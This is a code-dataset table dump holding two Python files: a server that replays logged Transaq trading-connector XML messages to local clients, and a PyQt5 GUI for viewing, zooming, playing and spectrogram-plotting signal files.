hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
954247760ca27215be05471a291c59564bb8fb8e | 3,872 | py | Python | TransaqReplayServer.py | dandolbilov/TransaqReplayer | 7477cd319632c94295eac83ea7f1ff3980925c10 | [
"Apache-2.0"
] | null | null | null | TransaqReplayServer.py | dandolbilov/TransaqReplayer | 7477cd319632c94295eac83ea7f1ff3980925c10 | [
"Apache-2.0"
] | null | null | null | TransaqReplayServer.py | dandolbilov/TransaqReplayer | 7477cd319632c94295eac83ea7f1ff3980925c10 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
File: TransaqReplayServer.py
Author: Daniil Dolbilov
Created: 18-Oct-2020
"""
import logging
import threading
import time
from multiprocessing.connection import Listener
class TransaqReplayServer:
def __init__(self, xdf_file, host='localhost', port=7070, authkey=b'secret phrase'):
self.xdf_file = xdf_file
self.xdf_encoding = 'windows-1251'
self.skip_list = ['<pits>', '<securities>', '<sec_info_upd>']
self.host = host
self.port = port
self.authkey = authkey
def run_server(self):
logging.info('server: listen [%s:%s]...' % (self.host, self.port))
with Listener((self.host, self.port), authkey=self.authkey) as listener:
logging.info('server: listen started')
while True:
conn = listener.accept()
logging.info('server: client accepted [%s]' % conn._handle)
c_thread = threading.Thread(target=self.client_thread, args=(conn, ))
c_thread.start()
def client_thread(self, conn):
self.replay_events(conn)
logging.info('server: close [%s]' % conn._handle)
conn.close()
def replay_events(self, conn):
with open(self.xdf_file, mode='r', encoding=self.xdf_encoding) as f:
for line in f:
# === FORMAT SAMPLE ===
# 140551.705448 [4804] [0360] <cmd> [V] System version 6.06. TXmlConnector version 2.20.25
# 140551.718466 [4804] [0360] <cmd> [I] <command id="connect"><login> ...
# 140552.720939 [4804] [0360] <res> [R] <result success="true"/>
# 140553.019380 [4804] [clbk] <info> [O] [830u] <markets> ...
# 140553.353871 [4804] [clbk] <info> [O] [150770u] <securities><security secid="0" active="true"> ...
# 140605.644962 [4804] [clbk] <info> [O] [333u] <sec_info_upd><secid>29244</secid><seccode>BR55BJ0</seccode> ...
# 140605.645964 [4804] [clbk] <info> [O] [338u] <sec_info_upd><secid>29245</secid><seccode>BR55BV0</seccode> ...
# 140624.969489 [4804] [clbk] <info> [O] [4304u] <orders><order transactionid="195726"> ...
# 140624.973494 [4804] [clbk] <info> [O] [3540u] <trades><trade><secid>41824</secid> ...
# 140624.980504 [4804] [clbk] <info> [O] [6139u] <positions><forts_position><client> ...
# 140643.576875 [4804] [clbk] <info> [O] [861u] <quotations><quotation secid="32518"><board>FUT</board><seccode>SiZ0</seccode><last>78508</last><quantity>12</quantity> ...
# 140643.676021 [4804] [clbk] <info> [O] [862u] <quotations><quotation secid="32518"><board>FUT</board><seccode>SiZ0</seccode><last>78509</last><quantity>1</quantity> ...
ss = line.split(' ')
if len(ss) < 7 or ss[4] != '[O]':
logging.warning('SKIP: %s' % line.strip())
continue
header = ' '.join(ss[0:6])
xml_msg = line[len(header) + 1:].strip()
if xml_msg.startswith(tuple(self.skip_list)):
continue
# TODO: emulate pause between events (historical)
time.sleep(0.5)
msg_trimmed = xml_msg[:50] # data is very long, just log some chunk
if conn:
logging.debug('[%s] send: %s ...' % (conn._handle, msg_trimmed))
conn.send(xml_msg)
else:
logging.debug('no_conn: %s ...' % msg_trimmed)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-8s [%(name)s] %(message)s')
xdf_file = '../logs/2020.10.16-140551/20201016_xdf.log'
replayer = TransaqReplayServer(xdf_file)
replayer.run_server()
| 45.552941 | 187 | 0.563791 | 450 | 3,872 | 4.742222 | 0.457778 | 0.033739 | 0.050609 | 0.054827 | 0.059981 | 0.059981 | 0.059981 | 0.059981 | 0.059981 | 0.059981 | 0 | 0.122688 | 0.27376 | 3,872 | 84 | 188 | 46.095238 | 0.636202 | 0.366477 | 0 | 0.041667 | 0 | 0 | 0.126137 | 0.01737 | 0 | 0 | 0 | 0.011905 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
954fc6dfbe050a3ecc085052cc9413b2339d8905 | 23,528 | py | Python | Signal-Viewer/Signal-Viewer.py | Radwa-Saeed/Didital-Signal-Processing-PyQt-GUI | 8d97e2925a20dd6a74d4bc0613bfceea668f2731 | [
"Apache-2.0"
] | null | null | null | Signal-Viewer/Signal-Viewer.py | Radwa-Saeed/Didital-Signal-Processing-PyQt-GUI | 8d97e2925a20dd6a74d4bc0613bfceea668f2731 | [
"Apache-2.0"
] | null | null | null | Signal-Viewer/Signal-Viewer.py | Radwa-Saeed/Didital-Signal-Processing-PyQt-GUI | 8d97e2925a20dd6a74d4bc0613bfceea668f2731 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'newGui.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets ,QtPrintSupport
from pyqtgraph import PlotWidget ,PlotItem
import os
import pathlib
import pyqtgraph as pg
import pandas as pd
import numpy as np
import sys
import random
import matplotlib
import matplotlib.pyplot as plt
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
class Ui_MainWindow(QtGui.QMainWindow):
signals = []
timer = []
data = []
n = []
nn = []
data_line = []
r = [1200,1200,1200]
z = [1,1,1]
spectrogram = []
checkBox = []
counter = -1
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1010, 878)
mW = QtGui.QIcon("Mw.png")
MainWindow.setWindowIcon(mW)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
for i in range(0,3):
self.signals.append( PlotWidget(self.centralwidget))
self.spectrogram.append( QtWidgets.QLabel(self.centralwidget))
self.checkBox.append(QtWidgets.QCheckBox(self.centralwidget))
if i == 0:
self.signals[i].setGeometry(QtCore.QRect(20, 90, 461, 192))
self.signals[i].setObjectName("signal_1")
self.spectrogram[i].setGeometry(QtCore.QRect(490, 90, 471, 192))
self.spectrogram[i].setObjectName("spectro_1")
self.checkBox[i].setGeometry(QtCore.QRect(20, 50, 68, 20))
self.checkBox[i].setObjectName("check_1")
elif i == 1:
self.signals[i].setGeometry(QtCore.QRect(20, 340, 461, 192))
self.signals[i].setObjectName("signal_2")
self.spectrogram[i].setGeometry(QtCore.QRect(490, 340, 471, 192))
self.spectrogram[i].setObjectName("spectro_2")
self.checkBox[i].setGeometry(QtCore.QRect(20, 300, 68, 20))
self.checkBox[i].setObjectName("check_2")
else:
self.signals[i].setGeometry(QtCore.QRect(20, 600, 461, 192))
self.signals[i].setObjectName("signal_3")
self.spectrogram[i].setGeometry(QtCore.QRect(490, 600, 471, 192))
self.spectrogram[i].setObjectName("spectro_3")
self.checkBox[i].setGeometry(QtCore.QRect(20, 560, 68, 20))
self.checkBox[i].setObjectName("check_3")
self.signals[i].setStyleSheet("background-color:rgb(0, 0, 0);")
self.signals[i].setRubberBandSelectionMode(QtCore.Qt.IntersectsItemBoundingRect)
self.signals[i].plotItem.showGrid(x=True, y=True )
self.signals[i].plotItem.setMenuEnabled(False)
self.checkBox[i].setStyleSheet("font: 10pt \"MS Shell Dlg 2\";")
self.spectrogram[i].setScaledContents(True)
self.open = QtWidgets.QPushButton(self.centralwidget)
self.open.setGeometry(QtCore.QRect(0, 1, 35, 35))
self.open.setText("")
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap("img/open.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.open.setIcon(icon3)
self.open.setObjectName("open")
self.save = QtWidgets.QPushButton(self.centralwidget)
self.save.setGeometry(QtCore.QRect(30, 1, 35, 35))
self.save.setText("")
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap("img/save.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.save.setIcon(icon2)
self.save.setObjectName("save")
self.Zoom_in = QtWidgets.QPushButton(self.centralwidget)
self.Zoom_in.setGeometry(QtCore.QRect(60, 1, 35, 35))
self.Zoom_in.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("img/zoom-in.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.Zoom_in.setIcon(icon)
self.Zoom_in.setObjectName("Zoom_in")
self.zoom_out = QtWidgets.QPushButton(self.centralwidget)
self.zoom_out.setGeometry(QtCore.QRect(90, 1, 35, 35))
self.zoom_out.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("img/zoom-out.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.zoom_out.setIcon(icon1)
self.zoom_out.setObjectName("zoom_out")
self.left = QtWidgets.QPushButton(self.centralwidget)
self.left.setGeometry(QtCore.QRect(120, 1, 35, 35))
self.left.setText("")
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap("img/previous.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.left.setIcon(icon7)
self.left.setObjectName("left")
self.play = QtWidgets.QPushButton(self.centralwidget)
self.play.setGeometry(QtCore.QRect(150, 1, 35, 35))
self.play.setText("")
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap("img/play.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.play.setIcon(icon5)
self.play.setObjectName("play")
self.right = QtWidgets.QPushButton(self.centralwidget)
self.right.setGeometry(QtCore.QRect(180, 1, 35, 35))
self.right.setText("")
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap("img/next.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.right.setIcon(icon6)
self.right.setObjectName("right")
self.pause = QtWidgets.QPushButton(self.centralwidget)
self.pause.setGeometry(QtCore.QRect(210, 1, 35, 35))
self.pause.setText("")
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap("img/pause.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pause.setIcon(icon4)
self.pause.setObjectName("pause")
self.spec = QtWidgets.QPushButton(self.centralwidget)
self.spec.setGeometry(QtCore.QRect(240, 1, 35, 35))
self.spec.setText("")
icon20 = QtGui.QIcon()
icon20.addPixmap(QtGui.QPixmap("img/spec3.jpeg"), QtGui.QIcon.Normal, QtGui.QIcon.On)
self.spec.setIcon(icon20)
self.spec.setObjectName("spec")
self.Zoom_in.raise_()
self.signals[0].raise_()
self.checkBox[1].raise_()
self.spectrogram[1].raise_()
self.spectrogram[2].raise_()
self.checkBox[2].raise_()
self.spectrogram[0].raise_()
self.signals[1].raise_()
self.signals[2].raise_()
self.checkBox[0].raise_()
self.zoom_out.raise_()
self.save.raise_()
self.open.raise_()
self.pause.raise_()
self.play.raise_()
self.right.raise_()
self.left.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1010, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuEdit = QtWidgets.QMenu(self.menubar)
self.menuEdit.setObjectName("menuEdit")
self.menuSignal_tools = QtWidgets.QMenu(self.menubar)
self.menuSignal_tools.setObjectName("menuSignal_tools")
self.menuPlay_navigate = QtWidgets.QMenu(self.menubar)
self.menuPlay_navigate.setObjectName("menuPlay_navigate")
MainWindow.setMenuBar(self.menubar)
self.actionOpen = QtWidgets.QAction(MainWindow)
icon9 = QtGui.QIcon()
icon9.addPixmap(QtGui.QPixmap("search.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionOpen.setIcon(icon9)
self.actionOpen.setObjectName("actionOpen")
self.actionzoom_in = QtWidgets.QAction(MainWindow)
icon10 = QtGui.QIcon()
icon10.addPixmap(QtGui.QPixmap("zoom-in_1.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionzoom_in.setIcon(icon10)
self.actionzoom_in.setObjectName("actionzoom_in")
self.actionzoom_out = QtWidgets.QAction(MainWindow)
icon11 = QtGui.QIcon()
icon11.addPixmap(QtGui.QPixmap("zoom-out.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionzoom_out.setIcon(icon11)
self.actionzoom_out.setObjectName("actionzoom_out")
self.actionSpectrogram = QtWidgets.QAction(MainWindow)
icon12 = QtGui.QIcon()
icon12.addPixmap(QtGui.QPixmap("sound.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSpectrogram.setIcon(icon12)
self.actionSpectrogram.setObjectName("actionSpectrogram")
self.actionPlay = QtWidgets.QAction(MainWindow)
icon13 = QtGui.QIcon()
icon13.addPixmap(QtGui.QPixmap("play-button.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionPlay.setIcon(icon13)
self.actionPlay.setObjectName("actionPlay")
self.actionPause = QtWidgets.QAction(MainWindow)
icon14 = QtGui.QIcon()
icon14.addPixmap(QtGui.QPixmap("pause-button.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionPause.setIcon(icon14)
self.actionPause.setObjectName("actionPause")
self.actionBackward = QtWidgets.QAction(MainWindow)
icon16 = QtGui.QIcon()
icon16.addPixmap(QtGui.QPixmap("backward.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionBackward.setIcon(icon16)
self.actionBackward.setObjectName("actionBackward")
self.actionForward = QtWidgets.QAction(MainWindow)
icon17 = QtGui.QIcon()
icon17.addPixmap(QtGui.QPixmap("forward.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionForward.setIcon(icon17)
self.actionForward.setObjectName("actionForward")
self.actionSave_as_pdf = QtWidgets.QAction(MainWindow)
icon18 = QtGui.QIcon()
icon18.addPixmap(QtGui.QPixmap("pdf-file.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSave_as_pdf.setIcon(icon18)
self.actionSave_as_pdf.setObjectName("actionSave_as_pdf")
self.menuFile.addAction(self.actionOpen)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionSave_as_pdf)
self.menuEdit.addAction(self.actionzoom_in)
self.menuEdit.addAction(self.actionzoom_out)
self.menuSignal_tools.addAction(self.actionSpectrogram)
self.menuPlay_navigate.addAction(self.actionPlay)
self.menuPlay_navigate.addAction(self.actionPause)
self.menuPlay_navigate.addSeparator()
self.menuPlay_navigate.addAction(self.actionBackward)
self.menuPlay_navigate.addAction(self.actionForward)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuEdit.menuAction())
self.menubar.addAction(self.menuPlay_navigate.menuAction())
self.menubar.addAction(self.menuSignal_tools.menuAction())
self.signals[0].hide()
self.checkBox[0].hide()
self.spectrogram[0].hide()
self.signals[1].hide()
self.checkBox[1].hide()
self.spectrogram[1].hide()
self.signals[2].hide()
self.checkBox[2].hide()
self.spectrogram[2].hide()
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.actionOpen.triggered.connect(lambda:self.opensignal())
self.actionzoom_in.triggered.connect(lambda:self.zoomin())
self.actionzoom_out.triggered.connect(lambda:self.zoomout())
self.actionSave_as_pdf.triggered.connect(lambda:self.savepdf())
self.actionBackward.triggered.connect(lambda:self.scrlleft())
self.actionForward.triggered.connect(lambda:self.scrlright())
self.actionSpectrogram.triggered.connect(lambda:self.spectro())
self.actionPlay.triggered.connect(lambda:self.playy())
self.actionPause.triggered.connect(lambda:self.pausee())
self.Zoom_in.clicked.connect(lambda:self.zoomin())
self.zoom_out.clicked.connect(lambda:self.zoomout())
self.left.clicked.connect(lambda:self.scrlleft())
self.right.clicked.connect(lambda:self.scrlright())
self.pause.clicked.connect(lambda:self.pausee())
self.play.clicked.connect(lambda:self.playy())
self.open.clicked.connect(lambda:self.opensignal())
self.save.clicked.connect(lambda:self.savepdf())
self.spec.clicked.connect(lambda:self.spectro())
def readsignal(self):
self.fname=QtGui.QFileDialog.getOpenFileName(self,' txt or CSV or xls',os.getenv('home'),"xls(*.xls) ;; text(*.txt) ;; csv(*.csv)")
path=self.fname[0]
self.data.append(np.genfromtxt(path))
def opensignal(self):
self.readsignal()
self.counter+=1
self.n.append(0)
self.nn.append(0)
self.data_line.append(self.signals[self.counter % 3].plot(self.data[self.counter], name="mode2"))
self.pen = pg.mkPen(color=(255, 0, 0))
# Set timer
self.timer.append(pg.QtCore.QTimer())
# Timer signal binding update_data function
x = self.counter
if x%3 == 0:
self.timer[x].timeout.connect(lambda: self.update_data1(x))
self.timer[x].start(50)
if x%3 == 1:
self.timer[x].timeout.connect(lambda: self.update_data2(x))
self.timer[x].start(50)
if x%3 == 2:
self.timer[x].timeout.connect(lambda: self.update_data3(x))
self.timer[x].start(50)
# The timer interval is 50ms, which can be understood as refreshing data once in 50ms
#self.timer1.start(50)
self.signals[x%3].show()
self.checkBox[x%3].show()
self.checkBox[x%3].setChecked(True)
# Data shift left
def update_data1(self,index):
if self.n[index] < len(self.data[index]) :
if self.n[index] < 1000 :
self.n[index] += 10
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(0, self.r[index] , padding=0)
else :
self.nn[index] += 10
self.n[index] += 10
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(self.nn[index],self.r[index] +self.nn[index] , padding=0)
self.z[index] = 1
else :
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(0 , len(self.data[index]) * self.z[index] , padding=0)
def update_data2(self,index):
if self.n[index] < len(self.data[index]) :
if self.n[index] < 1000 :
self.n[index] += 10
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(0, self.r[index] , padding=0)
else :
self.nn[index] += 10
self.n[index] += 10
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(self.nn[index],self.r[index] +self.nn[index] , padding=0)
self.z[index] = 1
else :
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(0 , len(self.data[index]) * self.z[index] , padding=0)
def update_data3(self,index):
if self.n[index] < len(self.data[index]) :
if self.n[index] < 1000 :
self.n[index] += 10
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(0, self.r[index] , padding=0)
else :
self.nn[index] += 10
self.n[index] += 10
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(self.nn[index],self.r[index] +self.nn[index] , padding=0)
self.z[index] = 1
else :
self.data_line[index].setData(self.data[index][0 : self.n[index]])
self.signals[index%3].plotItem.setXRange(0 , len(self.data[index]) * self.z[index] , padding=0)
def spectro(self):
index = (len(self.data) - 1) - ((len(self.data)-1)%3)
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
self.spectrogram[i].show()
if i==0:
plt.specgram(self.data[index], Fs= 250 )
elif i == 1:
if (len(self.data ) - 1 - index >= 1):
plt.specgram(self.data[index + 1], Fs= 250 )
else:
plt.specgram(self.data[index - 2], Fs= 250 )
else:
if (len(self.data) - 1 - index == 2):
plt.specgram(self.data[index + 2], Fs= 250 )
else:
plt.specgram(self.data[index - 1], Fs= 250 )
plt.savefig('spectro'+str(i)+'.png', dpi=300, bbox_inches='tight')
self.spectrogram[i].setPixmap(QtGui.QPixmap('spectro'+str(i)+'.png'))
plt.close(None)
def pausee(self):
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
if self.timer[i].isActive():
self.timer[i].stop()
def playy(self):
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
if self.timer[i].isActive()==False:
self.timer[i].start()
def zoomin(self):
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
self.signals[i].plotItem.getViewBox().scaleBy(x=0.5,y=1)
self.r[i]=self.r[i]*0.5
self.z[i] = self.z[i] * 0.5
def zoomout(self):
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
self.signals[i].plotItem.getViewBox().scaleBy(x=2,y=1)
self.r[i]=self.r[i]*2
self.z[i] = self.z[i] * 2
def scrlleft(self):
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
self.signals[i].plotItem.getViewBox().translateBy(x=-100,y=0)
def scrlright(self):
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
self.signals[i].plotItem.getViewBox().translateBy(x=100,y=0)
#
def savepdf(self):
fig=plt.figure(figsize=(1000, 1000))
index = (len(self.data) - 1) - ((len(self.data)-1)%3)
spectrogramData = []
for i in range (0,3):
if (self.checkBox[i].isChecked()==True):
if i == 0:
plt.subplot(3,2,1)
spectrogramData = list(self.data[index][0:])
plt.plot(spectrogramData,linewidth=0.5,scalex=True)
plt.subplot(3,2,2)
elif i == 1:
if (len(self.data ) - 1 - index >= 1):
plt.subplot(3,2,3)
spectrogramData = list(self.data[index+1][0:])
plt.plot(spectrogramData,linewidth=0.5,scalex=True)
plt.subplot(3,2,4)
else:
plt.subplot(3,2,3)
spectrogramData = list(self.data[index-2][0:])
plt.plot(spectrogramData,linewidth=0.5,scalex=True)
plt.subplot(3,2,4)
else:
if (len(self.data) - 1 - index == 2):
plt.subplot(3,2,5)
spectrogramData = list(self.data[index+2][0:])
plt.plot(spectrogramData,linewidth=0.5,scalex=True)
plt.subplot(3,2,6)
else:
plt.subplot(3,2,5)
spectrogramData = list(self.data[index-1][0:])
plt.plot(spectrogramData,linewidth=0.5,scalex=True)
plt.subplot(3,2,6)
plt.specgram(spectrogramData, Fs= 250)
plt.subplots_adjust(bottom=0.1,right=0.9,top=1.0)
plt.show()
fn,_=QtWidgets.QFileDialog.getSaveFileName(self,"Export PDF",None,"PDF files(.pdf);;AllFiles()")
if fn:
if QtCore.QFileInfo(fn).suffix()=="":
fn+=".pdf"
fig.savefig(fn)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.checkBox[1].setText(_translate("MainWindow", "signal-2"))
self.checkBox[1].setShortcut(_translate("MainWindow", "2"))
self.checkBox[2].setText(_translate("MainWindow", "signal-3"))
self.checkBox[2].setShortcut(_translate("MainWindow", "3"))
self.checkBox[0].setText(_translate("MainWindow", "signal-1"))
self.checkBox[0].setShortcut(_translate("MainWindow", "1"))
self.menuFile.setTitle(_translate("MainWindow", "File"))
self.menuEdit.setTitle(_translate("MainWindow", "Edit"))
self.menuSignal_tools.setTitle(_translate("MainWindow", "Signal tools"))
self.menuPlay_navigate.setTitle(_translate("MainWindow", "Play and navigate "))
self.actionOpen.setText(_translate("MainWindow", "Open"))
self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+o"))
self.actionzoom_in.setText(_translate("MainWindow", "Zoom-in"))
self.actionzoom_in.setShortcut(_translate("MainWindow", "Up"))
self.actionzoom_out.setText(_translate("MainWindow", "Zoom-out"))
self.actionzoom_out.setShortcut(_translate("MainWindow", "Down"))
self.actionSpectrogram.setText(_translate("MainWindow", "Spectrogram"))
self.actionSpectrogram.setShortcut(_translate("MainWindow", "S"))
self.actionPlay.setText(_translate("MainWindow", "Play"))
self.actionPlay.setShortcut(_translate("MainWindow", "Space"))
self.actionPause.setText(_translate("MainWindow", "Pause"))
self.actionPause.setShortcut(_translate("MainWindow", "Shift+Space"))
self.actionBackward.setText(_translate("MainWindow", "Backward"))
self.actionBackward.setShortcut(_translate("MainWindow", "Left"))
self.actionForward.setText(_translate("MainWindow", "Forward"))
self.actionForward.setShortcut(_translate("MainWindow", "Right"))
self.actionSave_as_pdf.setText(_translate("MainWindow", "Save as pdf"))
self.actionSave_as_pdf.setShortcut(_translate("MainWindow", "Ctrl+S"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
